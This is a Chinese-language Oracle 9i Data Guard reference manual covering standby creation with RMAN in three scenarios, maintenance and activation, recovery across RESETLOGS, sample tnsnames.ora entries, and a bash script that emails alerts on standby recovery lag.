参考文档:13

 

 

 

该文档是布置完standby后为客户写的参考手册,所有测试时在9204/Linux上完成,RMAN备份未使用catalog。该测试用的Data Guard是最简单的类型,与full backup recoveryDatabase无本质区别。

准备

注:该部分主要针对用于案例一

l         Primary Database设为archive log mode

SQL>alter system set log_archive_dest_1=location=/u01/oradata/prod/archive’

SQL>alter system set log_archive_start=true;

SQ>satartup mount force

SQL>alter database archivelog;

SQL>alter databae open;

 

l         Primary Database 设为 FORCE LOGGING

SQL>alter database force logging;

 

l         Primary SiteData Guard Site设置tnsnames.ora文件,见附件A

 

l         设置初始化参数

修改Primary Database的初始化参数文件,然后scpData Guard Site

 

以下参数是在Primary Database上的:

log_archive_dest_1=location=/u01/oradata/prod/archive’

log_archive_dest_2=location=/nfs/oradata/prod/archive’

log_archive_dest_3=’service=prod_stby’

standby_file_management=auto

 

Primary Site上创建pfile,并把它scpData Guard Site

 

Data Guard Database修改以下参数:

#log_archive_dest_2=location=/nfs/oradata/prod/archive’

# log_archive_dest_3=’service=prod_stby’

standby_archive_dest=/u01/oradata/prod/archive

fal_client=prod_stby

fal_server=prod_prim

 

注:fal_client, fal_server配置在standby端。 fal_server对应的service namestandbytnsnames.ora里,fal_client对应的service nameprimarytnsnames.ora里。

 

l         Primary Site创建Data Guard的控制文件, scpData Guard Site

SQL>alter database create standby controlfile as ‘/tmp/stby.ctl’;

 

l         Data Guard Site创建password file

$orapwd file=orapwprod password=sys_user_password entries=5;

 

l         Primary Site上最近的日常全备份的数据文件scpData Guard Site上。

 

l         Data Guard Site上创建必要的文件目录。

 

案例一

说明:这里讨论的是采用RMAN备份的资料来创建Data Guard DatabasePrimary/Data Guard Site在不同的服务器上,并且文件目录结构一致。

 

l         打开Data Guard Database实例:

SQL>startup nomount

 

l         连接rman,创建Data Guard Database,这里采用了restore后进行recover

的方式,文件路径与Primary Database一致:

 

$rman target sys/sys_user_password@prod_prim auxiliary /

RMAN>run {

  allocate auxiliary channel aux1 device type disk;

  allocate auxiliary channel aux2 device type disk;

  duplicate target database for standby nofilenamecheck dorecover;

}

 

如果在该过程中出现下面的错误,请在Primary Database归档并备份当前日志文件,并scpData Guard Site

RMAN-05507: standby controlfile checkpoint (5965178905648) is more recent than duplication point in time (5965178904203)

 

如果该过程没有显示错误信息,说明Data Guard Database已经成功创建了。

 

 

案例

说明:Primary DatabaseData Guard Database在同一台服务器,参数的设置稍有些不一样。

 

l         假设在Primary/Data Guard的文件目录结构如下:

 

Primary

Data Guard

Datafile

/u/oradata/chen/db

/u/oradata/chen/stby

Redo log

/u/oradata/chen/db

/u/oradata/chen/stby

Control file

/u/oradata/chen/db

/u/oradata/chen/stby

Backup directory

/u/backup/chen

/u/backup/chen

 

l         初始化参数文件:

Primary Database spfilechen.ora

*.log_archive_dest_1=’LOCATION=/u/oradata/chen/arch’

*.log_archive_dest_2=’service=chen_stby dependency=log_archive_dest_1 optional’

*.standby_file_management=’AUTO’

 

Data Guard Databse inittest.ora

*.db_file_name_convert=’/u/oradata/chen/db/’,’/u/oradata/chen/stby/’

*.fal_client=’CHEN_STBY’

*.fal_server=’CHEN_PRIM’

*.instance_name=’test’

*.lock_name_space=’test’

*.log_archive_dest_1=’LOCATION=/u/oradata/chen/arch’

*.log_file_name_convert=’/u/oradata/chen/db/’,’/u/oradata/chen/stby/’

*.standby_archive_dest=’/u/oradata/chen/arch’

 

说明:Primary Database初始化参数log_archive_dest_2使用了dependency属性,因此不必为Data Guard再生成一份归档日志文件,相应地,在Data Guard Databaselog_archive_dest_1standby_archive_dest也要设置正确。

 

l         创建Data Guard

$rman target / auxiliary sys/sys_user_password@chen_stby

RMAN>run {

  allocate auxiliary channel aux1 device type disk;

  allocate auxiliary channel aux2 device type disk;

  duplicate target database for standby nofilenamecheck dorecover;

}

 

 

案例

 

说明:下面介绍用RMAN备份,创建Data Guard时不连接Primary Database,并且文件的目录结构与Primary Database不一致。

 

l         假设在Primary/Data Guard的文件目录结构如下:

 

Primary

Data Guard

Datafile

/oradata/prod

/u/oradata/prod

Redo log

/oradata/prod, /opt/app/oracle/oradata/prod

/u/oradata/prod,

/opt/app/oracle/oradata/prod

Control file

/oradata/prod,

/opt/app/oracle/oradata/prod

/u/oradata/prod

/opt/app/oracle/oradata/prod

Backup directory

/u01/backup/prod

/u/backup/prod

 

准备过程与前面的方法一样,以下过程无特别说明,都是在Data Guard Site上处理。

 

l         加载实例

SQL>STARTUP NOMOUNT;

 

l         文件恢复

 

设置DBID

RMAN> SET DBID 2330521740;

 

恢复control file

RMAN> RUN {

ALLOCATE CHANNEL c1 DEVICE TYPE disk;

RESTORE CONTROLFILE FROM ‘/u/backup/prod/controlfile_20060405.bak’;

ALTER DATABASE MOUNT;

}

 

恢复数据文件:

SQL>declare

  devtype varchar2(256);

  done boolean;

begin

  devtype:=sys.dbms_backup_restore.deviceallocate (type=>”,ident=>’t1′);

  sys.dbms_backup_restore.restoresetdatafile;  sys.dbms_backup_restore.restoredatafileto(dfnumber=>03,toname=>’/u/oradata/prod/drsys01.dbf’);  sys.dbms_backup_restore.restoredatafileto(dfnumber=>05,toname=>’/u/oradata/prod/tools01.dbf’);  sys.dbms_backup_restore.restoredatafileto(dfnumber=>06,toname=>’/u/oradata/prod/users01.dbf’);  sys.dbms_backup_restore.restoredatafileto(dfnumber=>08,toname=>’/u/oradata/prod/statspack01.dbf’);  sys.dbms_backup_restore.restorebackuppiece(done=>done,handle=>’/u/backup/prod/db_20060405_342_1_586985480′,params=>null);

  sys.dbms_backup_restore.devicedeallocate;

end;

/

 

SQL>declare

  devtype varchar2(256);

  done boolean;

begin

  devtype:=sys.dbms_backup_restore.deviceallocate (type=>”,ident=>’t1′);

  sys.dbms_backup_restore.restoresetdatafile;  sys.dbms_backup_restore.restoredatafileto(dfnumber=>01,toname=>’/u/oradata/prod/system01.dbf’);  sys.dbms_backup_restore.restoredatafileto(dfnumber=>02,toname=>’/u/oradata/prod/undotbs01.dbf’);  sys.dbms_backup_restore.restoredatafileto(dfnumber=>04,toname=>’/u/oradata/prod/indx01.dbf’);

sys.dbms_backup_restore.restoredatafileto(dfnumber=>07,toname=>’/u/oradata/prod/xdb01.dbf’);

sys.dbms_backup_restore.restorebackuppiece(done=>done,handle=>’/u/backup/prod/db_20060405_343_1_586985480′,params=>null);

  sys.dbms_backup_restore.devicedeallocate;

end;

/

 

dbms_backup_restore的说明可以参考$ORACLE_HOME/rdbms/admin/dbmsbkrs.sqlprvtbkrs.plb文件。

恢复文件时,单独处理每个备份片,否者可能会报备份里没有要恢复的文件的错误。可以通过备份的日志文件或者连接RMAN,用下面命令来获取每个备份片里对应的文件:

RMAN>list backup of database;

 

恢复archived log files

SQL>declare

  devtype varchar2(256);

  done boolean;

begin

  devtype:=sys.dbms_backup_restore.deviceallocate(type=>”,ident=>’t1′);  sys.dbms_backup_restore.restoresetarchivedlog(destination=>’/u/oradata/prod/arch’);

sys.dbms_backup_restore.restoreArchivedLogRange(low_change=>415);

sys.dbms_backup_restore.restorebackuppiece(done=>done,handle=>’/u/backup/prod/arch_20060405_341_1_586985454′,params=>null);

  sys.dbms_backup_restore.devicedeallocate;

end;

/

 

可以通过备份的日志文件或者连接RMAN,用下面命令来获取每个备份片具体包含的archived log file

RMAN> list backup of archivelog all/list backup of archivelog from sequence 300;

 

l         文件重命名

alter database rename file ‘/oradata/prod/system01.dbf’ to

‘/u/oradata/prod/system01.dbf’;

alter database rename file ‘/oradata/prod/undotbs01.dbf’ to

‘/u/oradata/prod/undotbs01.dbf’;

alter database rename file ‘/oradata/prod/drsys01.dbf’ to

‘/u/oradata/prod/drsys01.dbf’;

alter database rename file ‘/oradata/prod/indx01.dbf’ to

 ‘/u/oradata/prod/indx01.dbf’;

alter database rename file ‘/oradata/prod/tools01.dbf’ to

‘/u/oradata/prod/tools01.dbf’;

alter database rename file ‘/oradata/prod/users01.dbf’ to

‘/u/oradata/prod/users01.dbf’;

alter database rename file ‘/oradata/prod/xdb01.dbf’ to

‘/u/oradata/prod/xdb01.dbf’;

alter database rename file ‘/oradata/prod/statspack01.dbf’ to

‘/u/oradata/prod/statspack01.dbf’;

 

l         Recover database

RMAN>RECOVER DATABASE UNTIL SEQUENCE 457 thread 1;

 

至此,我们相当于恢复了一个普通的数据库,下面将把该数据库设成Data Guard Database

Primary Database上生成standby control file,替换掉Data Guard Sitecontrol file

 

Data Guard Database的初始化参数里增加下面参数:

db_file_name_convert=’/oradata/prod/’,’/u/oradata/prod/’

log_file_name_convert’/oradata/prod/’,’/u/oradata/prod/’

 

加载Data Guard Database

SQL>startup nomount

SQL>alter database mount standby database;

SQL> alter database recover automatic standby database;

 

 

维护

l         加载数据库:

SQL>startup nomount;

SQL>alter database mount standby database;

 

l         打开/取消Data Guard Databasemanaged recovery

SQL>alter database recover managed standby database disconnect from session;

SQL>alter database recover managed standby database cancel;

 

l         只读打开,并增加临时文件,如果处于恢复模式,则先取消恢复:

SQL>alter database open read only;

 

SQL>alter tablespace temp add tempfile ‘/oradata/prod/temp01.dbf’ size 1025m;

SQL>alter tablespace temp add tempfile ‘/oradata/prod/temp02.dbf’ size 1025m;

 

注:在目前版本,physical standby 不支持分布式查询。

激活Data Guard Database

有几种方法可以把Data Guard Database变成Primary Database,在激活Data Guard Database时,只要有可能,就应该避免数据丢失。

 

l         通过发布ACTIVATE命令激活:

该方法激活Data Guard Database后,需要resetlog,是最方便的,激活后要尽快做个备份。如果可能的话,归档所有的Primary Database redo log,并在Data Guard Database上恢复。

 

SQL>startup nomount

SQL>alter database mount standby database;

SQL>alter database activate standby database;

 

l         通过重新创建控制文件来激活:

如果Primary Database出现故障,存在无法被归档的redo log资料,并且那些未被归档的redo log文件没有被破坏,可以考虑该方法,能够做到资料不丢失。与ACTIVATE相比,该方法应是首选。

 

1  Primary Databaseredo log拷贝到Data Guard Siteredo log目录上;

 

2  Data Guard Database上:

alter database backup controlfile to trace;

取出创建controlfile sql,使用NORESETLOGS

 

3         创建新的控制文件。

 

4         recover database

 

5         打开数据库。

 

l         Primary DatabaseData Guard Database进行角色互换,这种方法一般在计划的维护中用到,在做角色转换时要保证网络稳定,否则可能出现问题需要手工解决。

如果计划的时间比较紧,可以考虑如下处理(在primary site):

1          switch redo log

2          issue checkpoint

3          stop listener

4          startup force

5          switchover

6          start listener

 

激活Data Guard Database后,如果没有添加临时数据文件的,需要添加临时数据文件。

 

 

通过RESETLOGS的恢复

采用case 2创建的Data Guard做测试,在激活该Data Guard后,在里面创建新的数据库对象,数据文件。

通过resetlogs恢复的关键是:

l         拥有RESETLOGS前后的控制文件,可以是备份的控制文件;

l         知道RESETLOGSSCN

l         RESETLOGS前的数据库备份文件;

l         恢复时必要的archived logs

 

l         准备:

获取RESETLOGSSCN

可以通过几种方法来获取该SCN

l         查询v$database

SQL>col RESETLOGS_CHANGE# format 9999999999999

SQL>select RESETLOGS_CHANGE# from v$database;

RESETLOGS_CHANGE#

—————–

5965186246274

 

l         通过RMAN列出

RMAN> list incarnation of database;

using target database controlfile instead of recovery catalog

List of Database Incarnations

DB Key  Inc Key DB Name  DB ID            CUR Reset SCN  Reset Time

——- ——- ——– —————- — ———- ———-

1       1       PROD 2330521740       NO  1          29-DEC-05

2       2       PROD 2330521740       YES 5965186246274 08-APR-06

 

l         dump出控制文件/system文件

SQL>alter session set events ‘immediate trace name controlf level 3’;

dump文件的DATABASE ENTRY部分,有如下内容:

Incmplt recovery scn: 0x0000.00000000

Resetlogs scn: 0x056c.e0cea682 Resetlogs Timestamp  04/08/2006 13:32:47

Prior resetlogs scn: 0x0000.00000001 Prior resetlogs Timestamp  12/29/2005 14:45:32

 

转换一下:

Hex(0x056c.e0cea682) = Dec(5965186246274)

 

l         通过查看alert_SID.log文件

ALTER DATABASE ACTIVATE [PHYSICAL] STANDBY DATABASE

RESETLOGS after incomplete recovery UNTIL CHANGE 5965186246273

Resetting resetlogs activation ID 2330494092 (0x8ae8848c)

 

注意:通过前三种方法获取的SCN都比从alert_SID.log中获得的SCN1,在alert_SID.log里的SCN才是真实的,因此通过前三种方法获得的SCN需要减去1

 

l         模拟一些事务:

创建了两个表空间和用户chen,并在chen里创建了几个表。

SQL>create tablespace test datafile ‘/u/oradata/prod/test01.dbf’ size 129m uniform size 1m;

SQL>create tablespace data datafile ‘/u/oradata/prod/data01.dbf’ size 257m uniform size 1m;

SQL>create user chen identified by chen default tablespace users temporary tablespace temp;

SQL>grant create session,create table to chen;

SQL>alter user chen quota unlimited on users;

SQL>alter user chen quota unlimited on test;

SQL>alter user chen quota unlimited on data;

chen里创建表,加载数据。

 

SQL>select table_name,tablespace_name from user_tables;

TABLE_NAME                     TABLESPACE_NAME

—————————— ——————————

T1                             USERS

T2                             USERS

T3                             TEST

T4                             USERS

T5                             DATA

 

SQL>@filelist.sql

Datafiles info:

 

TABLESPACE_NAME  FILE_NAME                                          TOTAL    FREE     USED     PCT_FREE   MAX_BLKS STATUS     AUT

—————- ————————————————– ——– ——– ——– ———- ——– ———- —

DATA             /u/oradata/prod/data01.dbf                     257      170      87       66.15      21760    AVAILABLE  NO

TEST             /u/oradata/prod/test01.dbf                     129      42       87       32.56      5376     AVAILABLE  NO

USERS            /u/oradata/prod/users01.dbf                    1000     482      518      48.2       61688    AVAILABLE  YES

。。。。。。

 

Tempfiles info:

 

TABLESPACE_NAME  FILE_NAME                                          TOTAL    FREE     USED     PCT_FREE   MAX_BLKS STATUS     AUT

—————- ————————————————– ——– ——– ——– ———- ——– ———- —

TEMP             /u/oradata/prod/temp01.dbf                     513      513      0        100                 AVAILABLE  NO

 

Controlfiles info:

 

FILE_NAME

————————————————–

/u/oradata/prod/control01.ctl

/u/oradata/prod/control02.ctl

 

Redo log info:

THREAD# GROUP#  KBYTES    ARCH    STATUS      SEQ#      TYPE    MEMBER                                  PCT_USED

1       1       102400    YES     INACTIVE    11        ONLINE  /u/oradata/prod/redo01_a.log

1       2       102400    YES     INACTIVE    10        ONLINE  /u/oradata/prod/redo02_a.log

1       3       102400    NO      CURRENT     12        ONLINE  /u/oradata/prod/redo03_a.log        89.54%

 

当前的redo log已经写了89.54%的内容了。

 

SQL>shutdown abort

 

保存一下现有的control file, redo log

 

l         恢复:

RESETLOGS前的恢复

这部分恢复与case 2的前面过程差不多,参照case 2。在数据文件restore后,发布如下命令:

SQL>recover database until change 5965186246273 using backup controlfile;

 

这个执行完后,关闭数据库,把前面备份的在RESETLOGS后的control fileredo log恢复到对应的位置。

 

RESETLOGS后的恢复:

 

SQL>startup mount

SQL>recover database;

将提示如下错误:

ORA-01110: data file 9: ‘/u/oradata/prod/test01.dbf’

ORA-01157: cannot identify/lock data file 9 – see DBWR trace file

ORA-01110: data file 9: ‘/u/oradata/prod/test01.dbf’

 

这是因为后来创建的数据文件,当前的控制文件里有该文件信息,而在磁盘上没有的缘故,因为创建该文件后的archived log都存在,可以从archived log里恢复出来,现在把该文件建起来:

SQL>alter database create datafile ‘/u/oradata/prod/test01.dbf’ as

‘/u/oradata/prod/test01.dbf’;

SQL>alter database create datafile ‘/u/oradata/prod/data01.dbf’ as

‘/u/oradata/prod/data01.dbf’;

 

SQL> recover database;

SQL>alter database open;

 

至此,恢复完成了,可以检查一下数据是否完整。

附件A

 

Standby site tnsnames.ora

prod_prim =

  (DESCRIPTION =

    (ADDRESS_LIST =

      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.8.9)(PORT = 1521))

    )

    (CONNECT_DATA =

      (SID = prod)

    )

  )

 

Primary site tnsnames.ora

prod_stby = (DESCRIPTION_LIST =

          (DESCRIPTION=

             (ADDRESS_LIST=

              (ADDRESS=(PROTOCOL=tcp) (HOST=192.168.8.119) (PORT=1521))

)

             (CONNECT_DATA=(SID=prod))

           )

)

 

 

附件B

检查Standby DB恢复。主库半小时切换一次日志,redo log size 50M,传输速率约200kB/s,考虑到远程传输日志及恢复时间,假设Standby DB40分钟内恢复是正常的。

check_stby_recovery.sh

#!/bin/bash

 

cd `dirname $0`/..

. conf/define

 

TIME_LAG=2400

RESENDLAG=1800

RESENDTIMES=3

SQLPLUS=${ORACLE_HOME}/bin/sqlplus

SPOOLLOG=${BASEDIR}/spool/stb_rcv.log

TMPLOG=${BASEDIR}/spool/stb.${ORACLE_SID}

 

RES=`${SQLPLUS} -s /nolog <<EOF

conn / as sysdba

set feedback off

set termout  off

set pagesize 0

set line 130

col seq format a10

spool ${SPOOLLOG}

select ‘#’||SEQUENCE# seq,’#’||REGISTRAR,’#’||APPLIED,’#’||to_char(COMPLETION_TIME,’yyyy/mm/dd hh24:mi:ss’)||’         #’||trunc((sysdate-COMPLETION_TIME)*1440) from v\\$archived_log where SEQUENCE# = (select max(SEQUENCE#) from v\\$archived_log) and COMPLETION_TIME < sysdate – ${TIME_LAG}/86400;

spool off

exit

EOF`

 

ERRCNT=`echo ${RES}|grep -c ORA-`

if [ ${ERRCNT} -gt 0 ] ; then

   NOW=`date +%s`

   if [ ! -f $TMPLOG ]; then

      echo “1:$NOW” > $TMPLOG

      /bin/echo ${RES}|/usr/bin/email -s “Data Guard ${ORACLE_SID} on `hostname` may have problems, pls check.” ${MAILTO}

   else

      LASTSEND=`tail -1 $TMPLOG|cut -d: -f1`

      LASTTIME=`tail -1 $TMPLOG|cut -d: -f2`

      if [ $LASTSEND -ge $RESENDTIMES ]; then

         exit

      else

         LAG=`expr $NOW – $LASTTIME`

         if [ $LAG -ge $RESENDLAG ]; then

              LASTSEND=`expr $LASTSEND + 1`

              echo “$LASTSEND:$NOW” >> $TMPLOG

              /bin/echo ${RES}|/usr/bin/email -s “Data Guard ${ORACLE_SID} on `hostname` may have problems, pls check.” ${MAILTO}

              exit

         fi

      fi

   fi

else

   if [ -f $TMPLOG ]; then

      rm -f $TMPLOG

   fi

fi

 

CNT=`/bin/grep -c “#” ${SPOOLLOG}`

if [ ${CNT} -gt 0 ] ; then

   /bin/cat ${SPOOLLOG}|/usr/bin/email -s “Data Guard ${ORACLE_SID} on `hostname` recovery delay, pls check!” ${MAILTO}

fi

 

参考文档:

Oracle8i备份与恢复手册

Oracle® Data Guard —— Concepts and Administration

Oracle9i Recovery Manger User’s Guide

Oracle 9i RMAN备份与恢复技术——配置和使用Oracle恢复管理器

 

« Previous PageNext Page »

Create a free website or blog at WordPress.com.